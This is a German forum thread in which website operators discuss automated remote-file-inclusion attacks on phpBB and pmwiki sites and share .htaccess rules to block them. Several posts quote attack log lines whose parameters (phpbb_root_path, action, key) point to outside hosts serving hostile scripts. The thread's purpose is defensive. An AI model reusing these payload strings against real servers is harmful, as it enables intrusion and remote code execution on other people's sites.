Was kann man gegen einen Website Hacker unternehmen - Exploit Angriffe

#1 Als ich gestern meine Mails abgerufen habe, habe, war eine Mail von meiner Websecuritysoftware dabei:

Zitat

Angriff wurde erkannt und blockiert:
IP: 82.198.80.65
USER-AGENT: libwww-perl/5.63
DATEI: /viewflash.php?gid=-17.04.2007-15:18/modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://www.kadastra.com/de/ec.txt?

ich habe mich geärgert, mir aber nichts weiter dabei gedacht!

heute kam aber wieder eine mail:

Zitat

Angriff wurde erkannt und blockiert:
IP: 62.2.247.210
USER-AGENT: libwww-perl/5.805
DATEI: /viewflash.php?gid=2-10.03.2007-21:28/toplist.php?f=toplist_top10&phpbb_root_path=http://71.102.93.10/WTS/bin/hak/idpitbull.txt?

Ich habe gegoogelt, und scheine nicht der einzige zu sein, dem dieser depp das leben schwer macht....

was kann man gegen so einen Hacker tun?
__________
Um einen Server perfekt zu schützen muss man ihn herunterfahren. Oxpus

#2 klassischer XSS Hacking Versuch!

tun kann man dagegen lediglich
* sichere Software verwenden, die keine XSS Lücken aufweist.
* IPs von Hacking Versuchen temporär sperren.

einige Hoster wie All-inkl greifen einem hier auch schon unter die Arme.

darf ich fragen, welche Software Du für die Erkennung solcher Angriffe verwendest?

Greetz Lp

#3 ich habe die software Cracker Tracker

ich habe sie so modifiziert, dass sie mir bei einem hackversuch eine mail schickt...

nochetwas: der hacker benutzt jedes mal eine andere ip und hat vor ein paar stunden meinen server drei mal inerhalb von 3 minuten versucht zu hacken:

Zitat

Angriff wurde erkannt und blockiert:
IP: 211.129.152.113
USER-AGENT: libwww-perl/5.79
DATEI: /viewflash.php?gid=2-10.03.2007-21:28/toplist.php?f=toplist_top10&phpbb_root_path=http://71.102.93.10/WTS/bin/hak/idpitbull.txt?

Zitat

Angriff wurde erkannt und blockiert:
IP: 62.75.156.129
USER-AGENT: libwww-perl/5.800
DATEI: /viewflash.php?gid=2-10.03.2007-21:28/toplist.php?f=toplist_top10&phpbb_root_path=http://71.102.93.10/WTS/bin/hak/idpitbull.txt?

Zitat

Angriff wurde erkannt und blockiert:
IP: 220.237.14.135
USER-AGENT: libwww-perl/5.65
DATEI: /viewflash.php?gid=2-10.03.2007-21:28/toplist.php?f=toplist_top10&phpbb_root_path=http://71.102.93.10/WTS/bin/hak/idpitbull.txt?

__________
Um einen Server perfekt zu schützen muss man ihn herunterfahren. Oxpus

#4 der Angriff ist automatisch; der scannt einfach sämtliche Seiten ab.
anfällige Seiten führen dann halt den "bösen Code" aus.

solange Du die neuste Version vom phpbb verwendest und dein Server zudem sicher konfiguriert ist, landen diese Angriffe vermutlich im Leeren.

also am besten ignorieren!

Greetz Lp

#5 wenn ich mich nicht recht irre, würde dieser angriff sowieso nur mit register global variabls on funktionieren, oder?
__________
Um einen Server perfekt zu schützen muss man ihn herunterfahren. Oxpus

#6 wenn ich mir das Exploit Script angucke müssen folgende Vorraussetzungen gegeben sein:

Safemode = off -> da dort system Befehle ausgeführt werden
register global variables = on (da fremde Variablen verwendet werden)

der Server/Apache müsste also schon ziemlich mies konfiguriert sein.

Greetz Lp

#7

Zitat

Safemode = off -> da dort system Befehle ausgeführt werden
register global variables = on (da fremde Variablen verwendet werden)

Derartige Einstellung sind nicht nur non-default sondern auch einfach nur gefährlich, niemand sollte register globals aktiviert haben.
Man sollte diese Option wirklich komplett entfernen.
__________
E-Mail: therion at ninth-art dot de
IRC: megatherion @ Freenode

#8 und wenn der hack gelungen währe - was hätte der hacker dann für informationen geliefert bekommen?

EDIT:
eigentlich doch nur das, was die shell beim kommando id zurückliefert, oder?
__________
Um einen Server perfekt zu schützen muss man ihn herunterfahren. Oxpus

#9 HAllo allerseits,
Meine Website www.kolibriethos.de oder www.11h.de läuft mit pmwiki bei 1&1
Mit .htaccess rewriteing, kleinen php -scripten und zusätzlichen php.ini Dateien habe ich schon einiges an Angriffen abgefangen. (Dafür kann ich jetzt über pmwiki selbst nichts mehr uploaden)
Jetzt kommen aber neue komische Logeinträge.
Ich verstehe nicht, was hier passiert.
Kann es sein, dass irgendwelcher Hackcode schon irgendwo auf meinen Seiten installiert ist und hier verwendet wird.
Bin ich in irgendwelchen Listen, so dass die Roboter mich jetzt immer automatisch abklappern???
Für einen Tip wäre ich sehr dankbar!
Auf den Seiten wie 2youd.com/map.html stehen nur Mülllinks.
Am meisten ärgern mich die Domaineinträge. Nicht mal beschweren kann man sich!
Hans Hufnagel


[87] => 64.86.69.5 - - [20/Dec/2007:15:20:16 +0100] "GET /Forum/ZwischenDenReligionen HTTP/1.0" 200 16540 www.kolibriethos.de "xxxp://2youd.com/map.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060206 Songbird/0.1" "-"


[2] => 87.118.120.23 - - [20/Dec/2007:00:09:46 +0100] "GET /kewiki/pmwiki.php?n=Ethos.Auslegen HTTP/1.0" 200 32054 www.11h.de "xxxp://tvsetmp3.com" "Mozilla/4.7 (compatible; OffByOne; Windows 2000) Webster Pro V3.4" "-"

Domain Name: 2YOUD.COM

Registrant:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

Creation Date: 03-Oct-2007
Expiration Date: 03-Oct-2008

Domain servers in listed order:
ns1.bkasp.com
ns2.bkasp.com

Domain Name: TVSETMP3.COM

Registrant:
N/A
N/A (seomaster2006@gmail.com)
N/A
N/A
New York,N/A
US
Tel. +001.41512345678

Creation Date: 13-Oct-2007
Expiration Date: 13-Oct-2008

Domain servers in listed order:
ns2.skyhost.ru
ns1.skyhost.ru

#10 Hallo Allerseits,
die komischen Referers sind mir inzwischen klar.
Das waren nur einige Vorabtests. Kurze Zeit später kamen dann viele automatische Getanfragen, um zu sehen, ob die Page noch da ist und dann Mülleinträge ins Forum. Ich hab jetzt das Script zum Deaktivieren von Links erweitert und lösch den Müll automatisch. Wenn ich mehr Zeit habe, werd ich auf phpbb umsteigen.
Die Referer dienen ev. zum Infizieren der Computer der Sitebetreiber. Besser solchen Links nicht folgen.

Viele Grüße
HH

(@ Admin: Meinetwegen können meine zwei Einträge auch gelöscht werden)

#11 Hi,

deine Forenurl ist vll. in irgendwelchen Listen aufgetaucht, mittlerweile wird aber auch Google dazu genutzt potentielle Opfer zu finden.

Vll. willst du einfach Perl Scripten verbieten auf deinen Webserver zuzugreifen..Folgenden Schnipsel habe ich dazu gefunden:

Zitat

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl
RewriteRule ^.*$ - [F]

http://blog.evologiq.com/50-Hacker,-Hacker,-Hacker.html

Du sperrst damit alle Zugriffe, die "lbwww-perl" aus User Agent angeben, damit sind schonmal die meisten Script Kiddies geblockt (um mehr handelt es sich scheinbar nicht).
__________
Meine Seite zum Thema Datensicherung

#12 Vielen Dank OrangeD !!!!!!!!!

Ich hab das jetzt eingebaut und gleich erweitert um:

#http-variablen verbieten
RewriteCond %{QUERY_STRING} (=http)+
RewriteRule ^.*$ - [F]

Damit habe ich jetzt auch die Versuche los, meinen Variablen Links auf externen Schadcode unterjubeln zu wollen. Diese Versuche waren meist ohne libwww-perl:
[2497] => 210.99.24.144 - - [31/Jan/2008:00:42:07 +0100] "GET /Ethos/Homepage?action=http%3A%2F%2Fmslayouts.ws%2Ficons%2Fadministrator%2Fcomponents%2Fcom_menus%2Faruyi%2Fnejut%2F HTTP/1.0" 200 270 kolibriethos.de "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "-"
[2498] => 210.99.24.144 - - [31/Jan/2008:00:42:08 +0100] "GET /Ethos/Homepage?action=http%3A%2F%2Fwww.meexia.com%2Fblog%2Fwp-content%2Fthemes%2Fsquares%2Fnovofor%2Ftulatu%2F HTTP/1.0" 200 265 kolibriethos.de "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "-"
[2499] => 210.99.24.144 - - [31/Jan/2008:00:42:10 +0100] "GET /tinc?key=http%3A%2F%2Fwww.heaven-house.kz%2Ftemplates_c%2Fuwohe%2Feluz%2F&formname=Feedback HTTP/1.0" 451 812 kolibriethos.de "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "-"
[2500] => 210.99.24.144 - - [31/Jan/2008:00:42:10 +0100] "GET /tinc?key=http%3A%2F%2Fconcorduae.com%2Foldtaifgate%2Farticles%2Ftenisa%2Fqiburek%2F&formname=Feedback HTTP/1.0" 451 812 kolibriethos.de "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "-"

Bisher habe ich bei vielen dieser Attacken die Admins der Schadcodeseiten angeschrieben, bis es mir zuviel wurde.
So ist es viel eleganter!!
Nochmals vielen Dank - mod rewrite ist genial!
Hans